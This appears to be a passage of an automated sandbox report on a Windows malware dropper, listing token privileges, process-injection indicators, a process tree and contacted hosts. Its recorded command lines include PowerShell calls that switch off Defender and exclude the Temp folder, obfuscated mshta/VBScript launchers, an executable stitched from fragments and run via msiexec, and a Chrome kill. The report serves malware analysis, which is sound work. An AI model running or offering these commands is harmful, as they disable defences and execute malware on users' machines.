Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1596 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3744 wrote to memory of 3452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2504 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 4176 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 4424 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1140 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 1996 wrote to memory of 2032 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 3484 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 2504 wrote to memory of 3872 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 4836 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1036 wrote to memory of 4620 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe
PID 1140 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe

"C:\Users\Admin\AppData\Local\Temp\40C4D06433A2DB2E570B3302E01C5C2EBE51EFB59473A.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c43a743a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1922ecc1aaabd2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue196c8dc8316d5e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1967b2731eea4d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b1a112f2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19862f0a4c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b6650547.exe

Tue19b6650547.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19ad8dd95e905.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1922ecc1aaabd2.exe

Tue1922ecc1aaabd2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19581adec51f.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe

Tue196c8dc8316d5e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1967b2731eea4d.exe

Tue1967b2731eea4d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe

Tue19c43a743a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GDFKB.tmp\Tue19c43a743a35.tmp" /SL5="$601BC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19581adec51f.exe

Tue19581adec51f.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b2a645b19f70.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue199b79a9228e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19ad8dd95e905.exe

Tue19ad8dd95e905.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue1984208f692605cf.exe

Tue1984208f692605cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19862f0a4c.exe

Tue19862f0a4c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19de85da9de6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1140 -ip 1140

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue199b79a9228e.exe

Tue199b79a9228e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1984208f692605cf.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19de85da9de6.exe

Tue19de85da9de6.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 556

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19053251dd9e13fe.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b2a645b19f70.exe

Tue19b2a645b19f70.exe

C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DA9K6.tmp\Tue19c43a743a35.tmp" /SL5="$601DA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19c43a743a35.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue196c8dc8316d5e.exe") do taskkill -iM "%~nXx" /f

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19b1a112f2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC36F0836\Tue19896d3ece3b4.exe

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1252 -ip 1252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 12

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue196c8dc8316d5e.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3944 -ip 3944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 608

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3904 -ip 3904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 868 -ip 868

Network

Country Destination Domain Proto
US 209.197.3.8:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 mooorni.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 t.gogamec.com udp
US 188.114.97.0:443 t.gogamec.com tcp
US 104.21.51.48:443 niemannbest.me tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.listincode.com udp
AU 103.224.212.220:443 www.listincode.com tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 propanla.com udp
RU 45.130.41.25:80 propanla.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 ww25.listincode.com udp
US 199.59.243.220:80 ww25.listincode.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 gcl-gb.biz udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegatt.top udp
N/A 127.0.0.1:49830 tcp
N/A 127.0.0.1:49832 tcp
US 8.8.8.8:53 www.iyiqian.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 212.193.30.115 tcp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 162.159.135.233:80 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 s.lletlee.com udp
NL 212.193.30.115:80 212.193.30.115 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:80 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegatt.top udp
US 8.8.8.8:53 telegka.top udp
US 162.159.135.233:443 cdn.discordapp.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 telegka.top udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 s.lletlee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 directorycart.com udp
US 104.208.16.88:443 tcp
FI 135.181.129.119:4805 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 telegka.top udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 tierzahnarzt.at udp
US 8.8.8.8:53 telegin.top udp
DE 91.195.240.101:80 tierzahnarzt.at tcp
